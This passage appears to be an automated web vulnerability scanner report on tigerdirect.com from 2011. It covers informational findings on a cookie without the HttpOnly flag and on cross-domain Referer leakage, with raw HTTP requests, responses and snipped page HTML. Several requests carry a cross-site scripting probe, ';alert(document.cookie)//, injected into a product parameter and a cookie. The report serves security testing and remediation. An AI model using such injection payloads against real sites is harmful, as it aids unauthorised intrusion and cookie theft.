Cookie: pop%5Fcheck=active; visited=tempyes; Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp%3FEdpNo%3D6532393796d4%27%253balert%28document%2Ecookie%29%2F%2F5a2dd2f7153&Referer=; SessionId=2663007120110130101436173193214243; SSLB=0; SRCCODE=WEB1101; SRVR=WEBX12%2D06B; ASP.NET_SessionId=kjgyls45inwxcw55ezidnd45; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&ItemDetailsBeta=Y&msProduct=1782290&msRandX=44&CaptchaTextVal=9895C6C99F6C; CoreID6=35034674045812964005411&ci=90203773; CoreAt=90203773=1|1|0|0|0|0|0|0|0|0|0|0|1|1296400541||&; 90203773_clogin=l=1296400541&v=1&e=1296402343043

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
Content-Length: 802
Content-Type: text/html
Cache-Control: private
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 15:14:47 GMT
Connection: close
Set-Cookie: SRVR=WEBX10%2D07A; path=/
Set-Cookie: SRCCODE=WEB1101; expires=Tue, 01-Mar-2011 05:00:00 GMT; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

3.4. http://www.tigerdirect.com/secure/captcha/Default.aspx  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tigerdirect.com
Path:   /secure/captcha/Default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /secure/captcha/Default.aspx HTTP/1.1
Host: www.tigerdirect.com
Proxy-Connection: keep-alive
Referer: http://www.tigerdirect.com/applications/SearchTools/item-details.asp?EdpNo=6532393796d4'%3balert(document.cookie)//5a2dd2f7153
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pop%5Fcheck=active; visited=tempyes; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&ItemDetailsBeta=Y&msProduct=1782290&msRandX=44; SRVR=WEBX10%2D07A; Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp%3FEdpNo%3D6532393796d4%27%253balert%28document%2Ecookie%29%2F%2F5a2dd2f7153&Referer=; SessionId=2663007120110130101436173193214243; SRCCODE=WEB1101; SSLB=0

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 384
Date: Sun, 30 Jan 2011 15:14:42 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ASP.NET_SessionId=kjgyls45inwxcw55ezidnd45; path=/; HttpOnly
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&ItemDetailsBeta=Y&msProduct=1782290&msRandX=44&CaptchaTextVal=9895C6C99F6C; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>

...[SNIP]...

4. Cross-domain Referer leakage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tigerdirect.com
Path:   /applications/SearchTools/item-details.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

Request

GET /applications/SearchTools/item-details.asp?EdpNo=6532393 HTTP/1.1
Host: www.tigerdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA04B
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
Date: Sun, 30 Jan 2011 02:03:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: pop%5Fcheck=active; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: visited=tempyes; expires=Sun, 30-Jan-2011 05:00:00 GMT; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150A%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150A%2Ejpg&ItemDetailsBeta=Y&msProduct=335878&msRandX=15; path=/
Set-Cookie: SRVR=WEBX11%2D04B; path=/
Set-Cookie: Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp%3FEdpNo%3D6532393&Referer=; path=/
Set-Cookie: SessionId=3551021720110129210352173193214243; expires=Sun, 29-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: SRCCODE=WEB1101; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: SSLB=0; path=/; domain=.tigerdirect.com
Content-Length: 177746

<!--V2-->
<!-- Your IP is:192.204.11.202-->

<input type="hidden" name="hPayMthdBB" value="False" />
<SCRIPT LANGUAGE="javascript">
popWinGen = "";
function loadWindowGen(newTarget, newWidth, n
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
<a href="http://www.tigerdirect.com"><img src="http://images.highspeedbackbone.net/masthead/bluelogo.gif" alt="TigerDirect.com" border="0" /></a>
...[SNIP]...
<form action="http://www.tigerdirect.com/applications/SearchTools/search.asp" name="searchFRM" id="searchFRM" onSubmit="return chkSrch(this.keywords)" method="get"><img src="http://images.highspeedbackbone.net/mastheadusb/backsrch.gif" border="0"><input name="keywords" type="text" id="tigerv2_searchform" size="35" maxlength="90" style="padding-bottom:-2px;" onfocus="if(this.value=='Keyword or Item #')this.value='';" value="Keyword or Item #" a
...[SNIP]...
<form name="subscribe" method="post" action="http://www.tigerdirect.com/applications/email/d_subscribe.asp" onSubmit="return chkEml(this.email)"> <img src="http://images.highspeedbackbone.net/mastheadusb/backsrch.gif" border="0"/><input id="tigerv2_dealAlertform" name="email" type="text" size="13" maxlength="50" onfocus="if(this.value=='Email Address')this.value='';" onblur="if(this.value=='')this.value='Email Address';" value=
...[SNIP]...
<a style="color:#FFFFFF; font-family:Arial, Helvetica, sans-serif;" href="http://www.tigerdirect.com/cgi-bin/ShoppingCart.asp">Cart<img src="http://images.highspeedbackbone.net/mastheadusb/cartd.gif" border="0" />&nbsp;&nbsp;
       <span id="cart_item_count">
...[SNIP]...
<div id="site_logo"><img src="http://images.highspeedbackbone.net/homepage/promotions/exclusive_24hour/tigerLogo_overlay.png"/></div>
...[SNIP]...
<a href="#" onClick="lightbox('ccExO_wrapper','close')"><img src="http://images.highspeedbackbone.net/homepage/promotions/exclusive_24hour/closeButton.png" alt="Close Overlay" border="0" /></a>
...[SNIP]...
<a href="javascript:void(0)" onClick="lightbox('ccExO_wrapper','close')"> <img id="ccExButton_no" src="http://images.highspeedbackbone.net/homepage/promotions/exclusive_24hour/nothanksBtn_blue.jpg" border="0"/></a>
...[SNIP]...
<a href="javascript:void(0)" onClick="lightbox('ccExO_wrapper2','close')"> <img id="ccExButton_no" src="http://images.highspeedbackbone.net/homepage/promotions/exclusive_24hour/closeBtn_grey.jpg" border="0"/></a>
...[SNIP]...
<nolayer>
<iframe src="http://ad.doubleclick.net/adi/tigerdirect.com/Section_2_House;sz=977x40;ord=[timestamp]?" width="977" height="40" frameborder="0" marginwidth="0" marginheight="0" scrolling="no">
<a href="http://ad.doubleclick.net/jump/tigerdirect.com/Section_2_House;sz=977x40;abr=!ie4;abr=!ie5;abr=!ie6;ord=[timestamp]?">
<img src="http://ad.doubleclick.net/ad/tigerdirect.com/Section_2_House;sz=977x40;abr=!ie4;abr=!ie5;abr=!ie6;ord=[timestamp]?" width="977" height="40" border="0" alt="" /></a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/tigerdirect.com/Section_2_House;sz=977x40;ord=[timestamp]?"><img src="http://ad.doubleclick.net/ad/tigerdirect.com/Section_2_House;sz=977x40;ord=[timestamp]?" border="0" alt="" /></a>
...[SNIP]...
<!-- To be placed in the body of the page, where you want the banner to appear -->
<img src="http://images.highspeedbackbone.net/main/pixel-clr.gif" height="2" width="1"><br clear="all">
...[SNIP]...
<a href="/applications/Category/guidedSearch.asp?CatId=12" id="guidedsearch"><img height="30" border="0" width="145" src="http://images.highspeedbackbone.net/campaigns/yamaha/images/spacer.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="0"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="18"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td height="7"><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td width="40"><img src="http://images.highspeedbackbone.net/homepage/icons_01.gif" width="40" height="30"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/icons_02.gif" width="40" height="30"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/icons_03.gif" width="40" height="24"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/icons_04.gif" width="40" height="25"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="18"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="18"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<a href="/cgi-bin/order.asp?EdpNo=6532393&amp;Qty=1&amp;h2fedpno=6635886&amp;ClickSource=ITW"><img border="0" align="absmiddle" src="http://images.highspeedbackbone.net/main/buynow_sp_sm.gif" alt="Add this service plan and the main item to the shopping cart."></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="/cgi-bin/order.asp?EdpNo=6532393&amp;Qty=1&amp;h2fedpno=6635947&amp;ClickSource=ITW"><img border="0" align="absmiddle" src="http://images.highspeedbackbone.net/main/buynow_sp_sm.gif" alt="Add this service plan and the main item to the shopping cart."></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="18"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=6052506&amp;csid=_21"><img src="http://images.highspeedbackbone.net/skuimages/small/V18-2238-main03-am.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(6052506,1,'_21');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=5372536&amp;csid=_21"><img src="http://images.highspeedbackbone.net/skuimages/small/A204-2220-main03-am.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(5372536,1,'_21');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=5532654&amp;csid=_21"><img src="http://images.highspeedbackbone.net/skuimages/small/A179-2264-main02-am.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(5532654,1,'_21');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=5719289&amp;csid=_21"><img src="http://images.highspeedbackbone.net/skuimages/small/H24-2206-main002-am.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(5719289,1,'_21');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=14956&amp;csid=_21"><img src="http://images.highspeedbackbone.net/skuimages/small/A204-2222-mainv01-ec.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(14956,1,'_21');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="15"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="3"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/add.gif" width="276" height="17"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="10"></td>
...[SNIP]...
<a href="javascript:MM_openBrWindow('/include/AddCartfromGallery.asp?EdpNo=6532393&amp;csid=ITD&amp;Sku=S203-2293&amp;imgcart=1','ImageCart','scrollbars=no,width=525,height=768')"><img name="imgLarge" src="http://images.highspeedbackbone.net/skuimages/large/S203-2293-main01-ec.jpg" border="0" alt="Samsung B2230HD 21.5&quot; Widescreen LCD Monitor" onerror="this.src='http://images.highspeedbackbone.net/SearchTools/no_image-med.gif';"></a>
...[SNIP]...
<a href="/applications/searchtools/search.asp?keywords=Samsung&amp;mnf=758" style="border:0"><img src="http://images.highspeedbackbone.net/VendorLogos/samsung_logo.gif" border="0"></a>
...[SNIP]...
</span>.
                       <img style="vertical-align:bottom" src="http://images.highspeedbackbone.net/ratingstars/star9.gif">(
                       2 reviews)
                   </td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="6" height="1"></td>
...[SNIP]...
<td colspan="2"><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="10"></td>
...[SNIP]...
<td colspan="2"><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="3"></td>
...[SNIP]...
<td colspan="2"><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="10"></td>
...[SNIP]...
<td colspan="2"><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="3"></td>
...[SNIP]...
<td colspan="4"><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="10"></td>
...[SNIP]...
<td colspan="4"><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="15"></td>
...[SNIP]...
<td colspan="4"><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="15"></td>
...[SNIP]...
<td colspan="2"><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="15"></td>
...[SNIP]...
<a href="item-details.asp?EdpNo=6532393&amp;csid=ITD&amp;body=WARRANTY#tabs" rel="nofollow"><img src="http://images.highspeedbackbone.net/item-details/extraprotection.jpg" border="0"></a>
...[SNIP]...
<td colspan="2"><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="5"></td>
</tr>
</table><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="5"><table>
...[SNIP]...
<a id="itemdets_submit_img" href="javascript:addToiCart(6532393,document.getElementById('q_6532393').value,'ITD');"><img src="http://images.highspeedbackbone.net/item-details/addtocart.jpg" border="0"><br>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="5"></td>
...[SNIP]...
script:MM_openBrWindow('/include/AddCartfromGallery.asp?EdpNo=6532393&amp;csid=ITD&amp;Sku=S203-2293&amp;imgcart=1&amp;imgcounter=1','ImageCart','scrollbars=no,width=525,height=768')" style="border:0"><img src="http://images.highspeedbackbone.net/skuimages/gallery/small/S203-2293-01.jpg" height="40" width="40" border="0" onmouseover="document.imgLarge.src='http://images.highspeedbackbone.net/skuimages/gallery/large/S203-2293-01.jpg'; document.imgLarge.width='300'; document.imgLarge.height='300'" onMouseOut="document.imgLarge.src='http://images.highspeedbackbone.net/skuimages/large/S203-2293-main01-ec.jpg'"></a></td>
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="6" height="1"></td>
...[SNIP]...
script:MM_openBrWindow('/include/AddCartfromGallery.asp?EdpNo=6532393&amp;csid=ITD&amp;Sku=S203-2293&amp;imgcart=1&amp;imgcounter=2','ImageCart','scrollbars=no,width=525,height=768')" style="border:0"><img src="http://images.highspeedbackbone.net/skuimages/gallery/small/S203-2293-02.jpg" height="40" width="40" border="0" onmouseover="document.imgLarge.src='http://images.highspeedbackbone.net/skuimages/gallery/large/S203-2293-02.jpg'; document.imgLarge.width='300'; document.imgLarge.height='300'" onMouseOut="document.imgLarge.src='http://images.highspeedbackbone.net/skuimages/large/S203-2293-main01-ec.jpg'"></a></td>
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="6" height="1"></td>
...[SNIP]...
script:MM_openBrWindow('/include/AddCartfromGallery.asp?EdpNo=6532393&amp;csid=ITD&amp;Sku=S203-2293&amp;imgcart=1&amp;imgcounter=3','ImageCart','scrollbars=no,width=525,height=768')" style="border:0"><img src="http://images.highspeedbackbone.net/skuimages/gallery/small/S203-2293-03.jpg" height="40" width="40" border="0" onmouseover="document.imgLarge.src='http://images.highspeedbackbone.net/skuimages/gallery/large/S203-2293-03.jpg'; document.imgLarge.width='300'; document.imgLarge.height='300'" onMouseOut="document.imgLarge.src='http://images.highspeedbackbone.net/skuimages/large/S203-2293-main01-ec.jpg'"></a></td>
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="6" height="1"></td>
...[SNIP]...
script:MM_openBrWindow('/include/AddCartfromGallery.asp?EdpNo=6532393&amp;csid=ITD&amp;Sku=S203-2293&amp;imgcart=1&amp;imgcounter=4','ImageCart','scrollbars=no,width=525,height=768')" style="border:0"><img src="http://images.highspeedbackbone.net/skuimages/gallery/small/S203-2293-04.jpg" height="40" width="40" border="0" onmouseover="document.imgLarge.src='http://images.highspeedbackbone.net/skuimages/gallery/large/S203-2293-04.jpg'; document.imgLarge.width='300'; document.imgLarge.height='300'" onMouseOut="document.imgLarge.src='http://images.highspeedbackbone.net/skuimages/large/S203-2293-main01-ec.jpg'"></a></td>
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="6" height="1"></td>
...[SNIP]...
script:MM_openBrWindow('/include/AddCartfromGallery.asp?EdpNo=6532393&amp;csid=ITD&amp;Sku=S203-2293&amp;imgcart=1&amp;imgcounter=5','ImageCart','scrollbars=no,width=525,height=768')" style="border:0"><img src="http://images.highspeedbackbone.net/skuimages/gallery/small/S203-2293-05.jpg" height="40" width="40" border="0" onmouseover="document.imgLarge.src='http://images.highspeedbackbone.net/skuimages/gallery/large/S203-2293-05.jpg'; document.imgLarge.width='300'; document.imgLarge.height='300'" onMouseOut="document.imgLarge.src='http://images.highspeedbackbone.net/skuimages/large/S203-2293-main01-ec.jpg'"></a></td>
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="6" height="1"></td>
...[SNIP]...
script:MM_openBrWindow('/include/AddCartfromGallery.asp?EdpNo=6532393&amp;csid=ITD&amp;Sku=S203-2293&amp;imgcart=1&amp;imgcounter=6','ImageCart','scrollbars=no,width=525,height=768')" style="border:0"><img src="http://images.highspeedbackbone.net/skuimages/gallery/small/S203-2293-06.jpg" height="40" width="40" border="0" onmouseover="document.imgLarge.src='http://images.highspeedbackbone.net/skuimages/gallery/large/S203-2293-06.jpg'; document.imgLarge.width='300'; document.imgLarge.height='300'" onMouseOut="document.imgLarge.src='http://images.highspeedbackbone.net/skuimages/large/S203-2293-main01-ec.jpg'"></a>
...[SNIP]...
<td colspan="2"><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="6"></td>
...[SNIP]...
</a><img src="http://images.highspeedbackbone.net/itemdetails/0_3.gif" height="41" border="0"><a href="javascript:MM_openBrWindow('/include/AddCartfromGallery.asp?EdpNo=6532393&amp;csid=ITD&amp;Sku=S203-2293&amp;imgcart=1','ImageCart','scrollbars=no,width=525,height=768')" rel="nofollow" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image1','','http://images.highspeedbackbone.net/itemdetails/1_2.gif',1)"><img src="http://images.highspeedbackbone.net/itemdetails/1_1.gif" height="41" border="0" name="Image1"></a>
...[SNIP]...
?EdpNo=6532393&amp;csid=ITD&amp;body=REVIEWS#tabs" rel="nofollow" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image11','','http://images.highspeedbackbone.net/itemdetails/11_2.gif',1)"><img src="http://images.highspeedbackbone.net/itemdetails/11_1.gif" height="41" border="0" name="Image11"></a>
...[SNIP]...
s.asp?EdpNo=6532393&amp;csid=ITD&amp;body=QA#tabs" rel="nofollow" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image14','','http://images.highspeedbackbone.net/itemdetails/14_2.gif',1)"><img src="http://images.highspeedbackbone.net/itemdetails/14_1.gif" height="41" border="0" name="Image14"></a>
...[SNIP]...
D&amp;body=MAIN#productresources" rel="nofollow" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image9','','http://images.highspeedbackbone.net/itemDetails/techspedia/button_over.jpg',1)"><img src="http://images.highspeedbackbone.net/itemDetails/techspedia/button.jpg" height="41" border="0" name="Image9"></a>
...[SNIP]...
p?EdpNo=6532393&amp;csid=ITD&amp;body=WARRANTY#tabs" rel="nofollow" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image7','','http://images.highspeedbackbone.net/itemdetails/7_2.gif',1)"><img src="http://images.highspeedbackbone.net/itemdetails/7_1.gif" height="41" border="0" name="Image7"></a>
...[SNIP]...
<a href="/sectors/ironclad/index.asp" rel="nofollow"><img src="http://images.highspeedbackbone.net/itemdetails/tab30day-b.gif" width="78" height="41" border="0"></a>
...[SNIP]...
pt:loadWindowGen('/include/whybuy.asp',600,600)" rel="nofollow" onmouseover="MM_swapImage('whybuy','','http://images.highspeedbackbone.net/itemdetails/tab13_1.gif',1)" onmouseout="MM_swapImgRestore()"><img src="http://images.highspeedbackbone.net/itemdetails/tab13_0.gif" name="whybuy" width="63" height="41" border="0" id="whybuy"></a><img src="http://images.highspeedbackbone.net/itemdetails/infotable_rightside1.gif" width="7" height="41" border="0"></td>
...[SNIP]...
<td valign="top" class="font_size3"><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="100%" height="5"><P>
...[SNIP]...
<br><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="10"><img src="http://images.highspeedbackbone.net/item-details/duopixel.gif" width="100%" height="2"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="5"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="5"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
LED Backlight:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
